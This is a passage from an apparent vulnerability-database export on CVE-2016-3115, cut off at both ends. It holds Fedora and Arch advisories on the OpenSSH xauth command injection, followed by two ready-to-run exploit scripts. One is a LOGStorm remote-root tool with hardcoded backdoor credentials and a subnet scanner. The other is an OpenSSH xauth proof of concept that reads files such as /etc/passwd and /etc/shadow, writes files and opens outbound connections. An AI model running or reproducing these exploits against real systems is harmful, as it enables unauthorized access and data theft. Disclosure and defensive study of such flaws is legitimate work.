"2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. 
", "modified": "2016-03-13T23:57:13", "published": "2016-03-13T23:57:13", "id": "FEDORA:407BB60A2C79", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: openssh-7.2p2-1.fc23", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This version of OpenSSH has been modified to support GSI authentication. This package includes the core files necessary for both the gsissh client and server. To make this package useful, you should also install gsi-openssh-clients, gsi-openssh-server, or both. ", "modified": "2016-04-25T23:56:33", "published": "2016-04-25T23:56:33", "id": "FEDORA:8B394604A712", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: gsi-openssh-7.2p2-1.fc23", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This version of OpenSSH has been modified to support GSI authentication. 
This package includes the core files necessary for both the gsissh client and server. To make this package useful, you should also install gsi-openssh-clients, gsi-openssh-server, or both. ", "modified": "2016-04-25T22:22:47", "published": "2016-04-25T22:22:47", "id": "FEDORA:6A9C96049DE4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: gsi-openssh-6.9p1-8.fc22", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "Missing sanitisation of untrusted input allows an authenticated user who\nis able to request X11 forwarding to inject commands to xauth.\n\nInjection of xauth commands grants the ability to read arbitrary files\nunder the authenticated user's privilege. Other xauth commands allow\nlimited information leakage, file overwrite, port probing and generally\nexpose xauth, which was not written with a hostile user in mind, as an\nattack surface.\n\nxauth is run under the user's privilege, so this vulnerability offers no\nadditional access to unrestricted accounts, but could circumvent key or\naccount restrictions such as sshd_config ForceCommand, authorized_keys\ncommand="..." 
or restricted shells.", "modified": "2016-03-11T00:00:00", "published": "2016-03-11T00:00:00", "id": "ASA-201603-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000577.html", "type": "archlinux", "title": "openssh: command injection", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:06", "description": "\nBlackStratus LOGStorm 4.5.1.354.5.1.96 - Remote Code Execution", "edition": 1, "published": "2016-12-04T00:00:00", "title": "BlackStratus LOGStorm 4.5.1.354.5.1.96 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-12-04T00:00:00", "id": "EXPLOITPACK:1902C998CBF9154396911926B4C3B330", "href": "", "sourceData": "#!/usr/bin/python\n# logstorm-root.py\n#\n# BlackStratus LOGStorm Remote Root Exploit\n#\n# Jeremy Brown [jbrown3264/gmail]\n# Dec 2016\n#\n# -Synopsis-\n#\n# \"Better Security and Compliance for Any Size Business\"\n#\n# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among\n# other things, to assume complete control over the virtual appliance with root privileges. 
This is\n# possible due to multiple network servers listening for network connections by default, allowing\n# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.\n#\n# -Tested-\n#\n# v4.5.1.35\n# v4.5.1.96\n#\n# -Usage-\n#\n# Dependencies: pip install paramiko MySQL-python\n#\n# There are (5) actions provided in this script: root, reset, sql, web and scan.\n#\n# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command\n# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password\n# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials\n# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account\n# [scan] scans a given <host>/24 for potentially vulnerable appliances\n#\n# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.\n#\n# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.\n#\n# -Fixes-\n#\n# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But\n# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall\n# network services or remove additional user accounts to mitigate these vulnerabilities.. 
or choose another\n# product altogether because this appliance, as of today, simply adds too much attack surface to the network.\n#\n# -Bonuses-\n#\n# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks\n# \n# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files\n# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running\n# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)\n#\n# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd\n#\n\nimport sys\nimport socket\nimport time\nfrom paramiko import ssh_exception\nimport paramiko\nimport MySQLdb\nimport httplib\nimport urllib\n\nSSH_BANNER = \"_/_/_/_/\"\nSSH_PORT = 22\nMYSQL_PORT = 3306\nMYSQL_DB = \"htr\"\nMYSQL_CMD = \"select USER_ID,hex(MD5_PASSWORD) from users;\"\nWEB_URL = \"/tvs/layout/j_security_check\"\n\nROOT_CREDS = [\"root\", \"3!acK5tratu5\"]\nHTINIT_CREDS = [\"htinit\", \"htinit\"]\nMYSQL_CREDS = [\"htr\", \"htr_pwd\"]\nWEB_CREDS = [\"webserviceuser\", \"donotChangeOnInstall\"]\n\n\ndef main():\n if(len(sys.argv) < 2):\n print(\"Usage: %s <action> <host>\" % sys.argv[0])\n print(\"Eg. 
%s root 10.1.1.3\\n\" % sys.argv[0])\n print(\"Actions: root reset sql web scan\")\n return\n \n action = str(sys.argv[1])\n host = str(sys.argv[2])\n\n if(\"scan\" not in action):\n try:\n socket.inet_aton(host)\n except socket.error:\n print(\"[-] %s doesn't look like a valid ip address\" % host)\n return\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n #\n # ssh login as root and execute 'id'\n #\n if(action == \"root\"):\n try:\n ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)\n except ssh_exception.AuthenticationException:\n print(\"\\n[-] Action failed, could not login with root credentials\\n\")\n return\n\n print(\"[+] Success!\")\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"id\")\n print(ssh_stdout.readline())\n\n return\n\n #\n # ssh login as htinit and reset root password to the default\n #\n elif(action == \"reset\"):\n print(\"[~] Resetting password on %s...\" % host)\n\n try:\n ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)\n except ssh_exception.AuthenticationException:\n print(\"\\n[-] Reset failed, could not login with htinit credentials\\n\")\n return\n\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"\")\n\n ssh_stdin.write(\"4\" + \"\\n\")\n time.sleep(2)\n ssh_stdin.write(ROOT_CREDS[1] + \"\\n\")\n time.sleep(2)\n ssh_stdin.write(\"^C\" + \"\\n\")\n time.sleep(1)\n\n print(\"[+] Appliance root password should now be reset\")\n\n return\n\n #\n # sql login as htr and select user/hash columns from the web users table\n #\n elif(action == \"sql\"):\n print(\"[~] Asking %s for it's web users and their password hashes...\" % host)\n\n try:\n db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)\n except MySQLdb.Error as error:\n print(\"\\n[-] Failed to connect to %s:\\n%s\\n\" % (host, error))\n return\n\n cursor = db.cursor()\n 
cursor.execute(MYSQL_CMD)\n\n data = cursor.fetchall()\n\n print(\"[+] Got creds!\\n\")\n\n for row in data:\n print(\"USER_ID: %s\\nMD5_PASSWORD: %s\\n\" % (row[0], row[1]))\n\n db.close()\n\n return\n\n #\n # http login as webserviceuser and gain presumably admin privileges\n #\n elif(action == \"web\"):\n print(\"[~] Attempting to login as backdoor web user at %s...\" % host)\n\n try: \n client = httplib.HTTPSConnection(host)\n except:\n print(\"[-] Couldn't establish SSL connection to %s\" % host)\n return\n\n params = urllib.urlencode({\"j_username\" : WEB_CREDS[0], \"j_password\" : WEB_CREDS[1]})\n headers = {\"Host\" : host, \"Content-Type\" : \"application/x-www-form-urlencoded\", \"Content-Length\" : \"57\"}\n\n client.request(\"POST\", WEB_URL, params, headers)\n\n response = client.getresponse()\n\n if(response.status == 408):\n print(\"[+] Success!\")\n else:\n print(\"[-] Service returned %d %s, which is actually not our criteria for success\" % (response.status, response.reason))\n\n return\n\n #\n # check the ssh network banner to identify appliances within range of <host>/24\n #\n elif(action == \"scan\"):\n count = 0\n print(\"[~] Scanning %s for LOGStorm appliances...\" % sys.argv[2])\n\n for x in range(1,255):\n banner = None\n\n #\n # 10.1.1.1/24 -> 10.1.1.[x]\n #\n host = str(sys.argv[2]).split('/')[0][:-1] + str(x)\n\n try:\n ssh.connect(host, SSH_PORT, \"user-that-doesnt-exist\", \"pass-that-doesnt-work\", timeout=2)\n except ssh_exception.NoValidConnectionsError:\n pass\n except socket.timeout:\n pass\n except ssh_exception.AuthenticationException as error:\n banner = ssh._transport.get_banner()\n if banner and SSH_BANNER in banner:\n print(\"[!] 
%s\\n\" % host)\n count+=1\n\n print(\"[+] Found %d appliance(s)\"% count)\n\n return\n\n \nif __name__ == \"__main__\":\n main()", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSH 7.2p1 - (Authenticated) xauth Command Injection", "edition": 1, "published": "2016-03-16T00:00:00", "title": "OpenSSH 7.2p1 - (Authenticated) xauth Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-16T00:00:00", "id": "EXPLOITPACK:9F2E746846C3C623A27A441281EAD138", "href": "", "sourceData": "'''\nAuthor: <github.com/tintinweb>\nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\nVersion: 0.2\nDate: Mar 3rd, 2016\n\nTag: openssh xauth command injection may lead to forced-command and /bin/false bypass\n\nOverview\n--------\n\nName: openssh\nVendor: OpenBSD\nReferences: * http://www.openssh.com/[1]\n\nVersion: 7.2p1 [2]\nLatest Version: 7.2p1\nOther Versions: <= 7.2p1 (all versions; dating back ~20 years)\nPlatform(s): linux\nTechnology: c\n\nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\nOrigin: remote\nMin. Privs.: post auth\n\nCVE: CVE-2016-3115\n\n\n\nDescription\n---------\n\nquote website [1]\n\n> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.\nSummary\n-------\n\nAn authenticated user may inject arbitrary xauth commands by sending an\nx11 channel request that includes a newline character in the x11 cookie.\nThe newline acts as a command separator to the xauth binary. This attack requires\nthe server to have 'X11Forwarding yes' enabled. 
Disabling it, mitigates this vector.\n\nBy injecting xauth commands one gains limited* read/write arbitrary files,\ninformation leakage or xauth-connect capabilities. These capabilities can be\nleveraged by an authenticated restricted user - e.g. one with the login shell\nconfigured as /bin/false or one with configured forced-commands - to bypass\naccount restriction. This is generally not expected.\n\nThe injected xauth commands are performed with the effective permissions of the\nlogged in user as the sshd already dropped its privileges.\n\nQuick-Info:\n\n* requires: X11Forwarding yes\n* bypasses /bin/false and forced-commands\n** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)\n* does not bypass /bin/nologin (as there is special treatment for this)\n\nCapabilities (xauth):\n\n* Xauth\n\t* write file: limited chars, xauthdb format\n\t* read file: limit lines cut at first \\s\n\t* infoleak: environment\n\t* connect to other devices (may allow port probing)\n\n\nPoC see ref github.\nPatch see ref github.\n\n\nDetails\n-------\n\n// see annotated code below\n\n * server_input_channel_req (serverloop.c)\n *- session_input_channel_req:2299 (session.c [2])\n *- session_x11_req:2181\n\n * do_exec_pty or do_exec_no_pty\n *- do_child\n *- do_rc_files (session.c:1335 [2])\n\nUpon receiving an `x11-req` type channel request sshd parses the channel request\nparameters `auth_proto` and `auth_data` from the client ssh packet where\n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\nand `auth_data` contains the actual x11 auth cookie. This information is stored\nin a session specific datastore. When calling `execute` on that session, sshd will\ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating\nif `auth_proto` and `auth_data` (and `display`) are set. 
If that is the case AND\nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`\nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.\nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\n`xauth` commands.\n\nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted\ninput as arguments to that script.\nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]\n\nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth\ncommand injection:\n\n\tSYNOPSIS\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\n\n\t\tadd displayname protocolname hexkey\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\n\t\t[n]extract filename displayname...\n\t\t[n]list [displayname...]\n\t\t[n]merge [filename...]\n\t\tremove displayname...\n\t\tsource filename\n\t\tinfo\n\t\texit\n\t\tquit\n\t\tversion\n\t\thelp\n\t\t?\n\t\t\nInteresting commands are:\n\t\n\tinfo\t - leaks environment information / path\n\t\t\t~# xauth info\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\tAuthority file: /root/.Xauthority\n\t\t\tFile new: yes\n\t\t\tFile locked: no\n\t\t\tNumber of entries: 0\n\t\t\tChanges honored: yes\n\t\t\tChanges made: no\n\t\t\tCurrent input: (argv):1\n\t\n\tsource\t - arbitrary file read (cut on first `\\s`)\n\t\t\t# xauth source /etc/shadow\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\n\t\t\t\t\t\t\n\textract - arbitrary file write\n\t\t\t * limited characters\n\t * in xauth.db format\n\t * since it is not compressed it can be combined with `xauth add` to\n\t first store data in the 
database and then export it to an arbitrary\n\t location e.g. to plant a shell or do other things.\n\t\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\n\t\t\t vulnerabilities in X.org\n\t\n\t\nSource\n------\n\nInline annotations are prefixed with `//#!`\n\n\n/*\n * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\n * first in this order).\n */\nstatic void\ndo_rc_files(Session *s, const char *shell)\n{\n...\n\t\tsnprintf(cmd, sizeof cmd, \"%s -q -\",\t\t\t\t\n\t\t options.xauth_location);\n\t\tf = popen(cmd, \"w\");\t\t\t\t\t\t\t//#! run xauth -q -\n\t\tif (f) {\n\t\t\tfprintf(f, \"remove %s\\n\",\t\t\t\t\t//#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command\n\t\t\t s->auth_display);\n\t\t\tfprintf(f, \"add %s %s %s\\n\",\t\t\t\t//#! \\n injection\n\t\t\t s->auth_display, s->auth_proto,\n\t\t\t s->auth_data);\n\t\t\tpclose(f);\n\t\t} else {\n\t\t\tfprintf(stderr, \"Could not run %s\\n\",\n\t\t\t cmd);\n\t\t}\n\t}\n}\n\nProof of Concept\n----------------\n\nPrerequisites:\n\n* install python 2.7.x\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\n* make sure `poc.py`\n\n\n Usage: <host> <port> <username> <password or path_to_privkey>\n\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n\n\npoc:\n\n1. 
configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\n\n#PUBKEY line - force commands: only allow \"whoami\"\n#cat /home/user1/.ssh/authorized_keys\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\n\n#cat /etc/passwd\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\n\t\n2. run sshd with `X11Forwarding yes` (kali default config)\n\n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\n\n3. `forced-commands` - connect with user1 and display env information\n\n#> python <host> 22 user1 .demoprivkey\n\nINFO:__main__:add this line to your authorized_keys file:\n#PUBKEY line - force commands: only allow \"whoami\"\n#cat /home/user/.ssh/authorized_keys\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n\nINFO:__main__:connecting to: user1:<PKEY>@host:22\nINFO:__main__:connected!\nINFO:__main__:\nAvailable commands:\n .info\n .readfile <path>\n .writefile <path> <data>\n .exit .quit\n <any xauth command or type help>\n\n#> .info\nDEBUG:__main__:auth_cookie: '\\ninfo'\nDEBUG:__main__:dummy exec returned: None\nINFO:__main__:Authority file: /home/user1/.Xauthority\nFile new: no\nFile locked: no\nNumber of entries: 1\nChanges honored: yes\nChanges made: no\nCurrent input: (stdin):3\n/usr/bin/xauth: (stdin):2: bad \"add\" 
command line\n...\n\t\t\n4. `forced-commands` - read `/etc/passwd`\n\n...\n#> .readfile /etc/passwd\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\nDEBUG:__main__:dummy exec returned: None\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\n...\n\n5. `forced-commands` - write `/tmp/testfile`\n\n#> .writefile /tmp/testfile `thisisatestfile`\nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\nDEBUG:__main__:dummy exec returned: None\nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\nDEBUG:__main__:dummy exec returned: None\nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\n\n#> ls -lsat /tmp/testfile\n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\n\n#> cat /tmp/testfile\n\\FA65500hi\\FA65500`thisisatestfile`\\AA\n\n6. `/bin/false` - connect and read `/etc/passwd`\n\n#> python <host> 22 user2 user2password\nINFO:__main__:connecting to: user2:user2password@host:22\nINFO:__main__:connected!\nINFO:__main__:\nAvailable commands:\n .info\n .readfile <path>\n .writefile <path> <data>\n .exit .quit\n <any xauth command or type help>\n\n#> .readfile /etc/passwd\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\nDEBUG:__main__:dummy exec returned: None\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\n...\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\n...\n\t\n7. 
`/bin/false` - initiate outbound X connection to 8.8.8.8:6100\n\n#> generate 8.8.8.8:100 .\t\n\n#> tcpdump\nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0\n\t\n\nMitigation / Workaround\n------------------------\n\n* disable x11-forwarding: `sshd_config` set `X11Forwarding no`\n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`\n\nNotes\n-----\n\nVerified, resolved and released within a few days. very impressive.\n\nVendor response: see advisory [5]\n\nReferences\n----------\n\n[1] http://www.openssh.com/\n[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388\n[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376\n[4] http://linux.die.net/man/1/xauth\n[5] http://www.openssh.com/txt/x11fwd.adv\n'''\n\n#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# Author : <github.com/tintinweb>\n###############################################################################\n#\n# FOR DEMONSTRATION PURPOSES ONLY!\n#\n###############################################################################\nimport logging\nimport StringIO\nimport sys\nimport os\n\nLOGGER = logging.getLogger(__name__)\ntry:\n import paramiko\nexcept ImportError, ie:\n logging.exception(ie)\n logging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\")\n sys.exit(1)\n\nclass SSHX11fwdExploit(object):\n def __init__(self, hostname, username, password, port=22, timeout=0.5, \n pkey=None, pkey_pass=None):\n self.ssh = paramiko.SSHClient()\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n if pkey:\n pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)\n self.ssh.connect(hostname=hostname, port=port, \n username=username, 
password=password, \n timeout=timeout, banner_timeout=timeout,\n look_for_keys=False, pkey=pkey)\n \n def exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"):\n transport = self.ssh.get_transport()\n session = transport.open_session()\n LOGGER.debug(\"auth_cookie: %s\"%repr(cmd))\n session.request_x11(auth_cookie=cmd)\n LOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\"))\n \n transport.accept(0.5)\n session.recv_exit_status() # block until exit code is ready\n stdout, stderr = [],[]\n while session.recv_ready():\n stdout.append(session.recv(4096))\n while session.recv_stderr_ready():\n stderr.append(session.recv_stderr(4096))\n session.close()\n return ''.join(stdout)+''.join(stderr) # catch stdout, stderr\n \n def exploit_fwd_readfile(self, path):\n data = self.exploit(\"xxxx\\nsource %s\\n\"%path)\n if \"unable to open file\" in data:\n raise IOError(data)\n ret = []\n for line in data.split('\\n'):\n st = line.split('unknown command \"',1)\n if len(st)==2:\n ret.append(st[1].strip(' \"'))\n return '\\n'.join(ret)\n \n def exploit_fwd_write_(self, path, data):\n '''\n adds display with protocolname containing userdata. 
badchars=<space>\n \n '''\n dummy_dispname = \"127.0.0.250:65500\"\n ret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data))\n if ret.count('bad \"add\" command line')>1:\n raise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data))\n LOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname)))\n return path\n \ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\"\n#cat /home/user/.ssh/authorized_keys\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n''' \nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69\n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn\nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN\nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts\nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh\nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH\nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W\ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O\naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne\neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T\nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA\nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe\nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj\nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc\nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9\n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7Dev
GYuELXbOgY\nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw\nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM\nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f\nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr\nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/\nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL\nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX\nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV\npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv\n-----END RSA PRIVATE KEY-----\"\"\"\n\n\nif __name__==\"__main__\":\n logging.basicConfig(loglevel=logging.DEBUG)\n LOGGER.setLevel(logging.DEBUG)\n \n if not len(sys.argv)>4:\n print \"\"\" Usage: <host> <port> <username> <password or path_to_privkey>\n \n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n \n\"\"\"\n sys.exit(1)\n hostname, port, username, password = sys.argv[1:]\n port = int(port)\n pkey = None\n if os.path.isfile(password):\n password = None\n with open(password,'r') as f:\n pkey = f.read()\n elif 